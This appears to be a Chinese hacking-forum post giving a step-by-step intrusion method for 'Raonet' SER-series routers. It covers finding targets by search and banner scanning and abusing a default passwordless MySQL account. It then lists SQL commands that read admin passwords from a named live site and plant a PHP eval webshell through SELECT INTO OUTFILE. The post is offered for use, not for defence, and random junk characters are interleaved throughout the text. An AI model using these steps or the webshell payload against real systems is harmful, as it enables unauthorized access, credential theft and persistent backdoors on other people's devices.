寻找存在漏洞的路由器方法:# [9 x8 D/ \3 Q7 F" [
3 m2 l' S! q+ @1 d0 F
1:google搜索'Raonet Subscriber Ethernet Router', J% v; l _3 k( z/ Y" F% M( [/ g; o
" E% U7 s8 @8 t1 P# ]. k2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
4 W, l( a) }2 y) r/ e( R+ F
* N. S8 q0 v$ |# u3 y3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。; P3 Q0 C, C# F3 Q/ E& b
2 p6 ~4 X: }# a+ _" I. k6 ]
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......, B) r7 j, S8 g, O
' B) \% ~6 X( U) I0 t $ S6 Y5 e0 `: X8 F+ Z# J6 K
' ^/ `1 V4 t5 {) U7 a/ O, b入侵步骤:# a6 X8 G* e( w V
& B5 j0 ?! n% M% A3 ]- B
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, N) Q+ ^9 h9 U8 _& i' l
/ T7 V" N; j7 Y* c
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
, z. P8 T; |1 q; a/ d3:得到密码后连接,查看GUI管理密码:
# L- p. g7 [$ s8 zuse ser_5004 ~2 e7 \$ K0 x' Q
select id,passwd from user;" x$ I+ i- L7 \, n! V+ o% x
4:通过数据库写入webshell,执行命令:
( a/ W4 @/ `2 I9 l* |( nuse mysql;( k$ I& V9 J% ~; k1 W) U
create table ok(cmd TEXT);
9 Z& r' K9 D& T1 W: U' P/ P) F' h2 @insert into ok values("<?php @eval($_POST[cmd])?>");* h& n$ q6 h1 I! d! w' E
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
, B% q3 d& |0 V7 [1 bdrop table ok;6 g4 g) X: z0 U+ f
) O3 ` ^+ J$ W2 `( k, G+ V( W- c- F, |5:连接后门shell.php 7 \ C6 P- z' M3 P2 ~( u" b" {
7 X1 m" ?& }3 W5 _/ C) [7 s6. 搞定!: y- E& E* |) V% y( D
2 J- C5 f# h: z# _6 Y+ K: P
|